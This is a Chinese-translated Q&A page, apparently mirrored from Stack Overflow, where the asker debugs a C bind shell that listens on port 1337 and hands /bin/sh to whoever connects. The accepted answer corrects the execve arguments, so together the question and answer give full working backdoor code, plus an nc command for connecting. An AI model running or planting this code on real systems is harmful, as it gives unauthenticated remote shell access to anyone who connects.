C语言中的简单Linux Bindshell-将Shell控制返回给客户端
[英]Simple Linux Bindshell in C - Returning Shell Control to Client
问题描述
我在使用简单的TCP绑定外壳时遇到了麻烦,我希望这里有人可以帮助我。
这是C语言中的一些简单示例代码,对我来说,问题是最后5行左右。
我们称它为simple_bindshell.c (我不是作者):
// Author: Julien Ahrens (@MrTuxracer)
// Website: http://www.rcesecurity.com
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(void)
{
int i; // used for dup2 later
int sockfd; // socket file descriptor
int clientfd; // client file descriptor
socklen_t socklen; // socket-length for new connections
struct sockaddr_in srv_addr; // server aka listen address
struct sockaddr_in cli_addr; // client address
srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address
srv_addr.sin_port = htons( 1337 ); // server port, converted to network byte order
srv_addr.sin_addr.s_addr = htonl (INADDR_ANY); // listen on any address, converted to network byte order
// create new TCP socket
sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
// bind socket
bind( sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr) );
// listen on socket
listen(sockfd, 0);
// accept new connections
socklen = sizeof(cli_addr);
clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &socklen );
// dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
for(i = 0; i <= 2; i++)
dup2(clientfd, i);
// magic
// execve( "/bin/sh", NULL, NULL );
//UPDATE: fixed exec call, shell still not returned to
// client connecting with execl or proper execve
execl("/bin/sh", "/bin/sh", (char *)NULL);
}
问题描述
编译后,我可以连接到套接字(使用:nc 192.168.xx 1337)。 问题是我的客户端连接立即关闭,并且外壳返回到服务器(而不是发起连接的客户端)上的simple_bindshell进程。
我知道我们已经复制了stdin,stdout,stderr文件描述符,但是我不确定如何链接到执行/ bin / sh。
我想发生的是,连接的客户端获得了交互式外壳。
我试图以几种不同的方式调用execve(例如,为argv传递不同的值),但是我似乎无法弄清为什么它不起作用。 execve是否需要客户端文件描述符?
任何帮助,将不胜感激
1 个解决方案
解决方案1
1 已采纳 2017-08-25 19:11:26
您对execve()参数是错误的。 第二个参数必须是指向字符串数组的指针,该字符串数组将成为新程序中的argv数组。 第三个参数必须是指向将要成为新程序的环境数组的字符串数组的指针。
char *new_argv[] = {"/bin/sh", NULL};
char *new_envp[] = {NULL};
execve( "/bin/sh", new_argv, new_envp);
您可以使用execl()更简单地完成此操作:
execl("/bin/sh", "/bin/sh", (char *)NULL);
在Linux中使用C的简单Shell实现,fork导致无限循环
[英]Simple shell implementation with C in linux, fork causing infinite loop
简单的Shell Linux C实现,使用freopen重定向标准输出
[英]simple shell linux C implementation, redirecting stdout with freopen
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.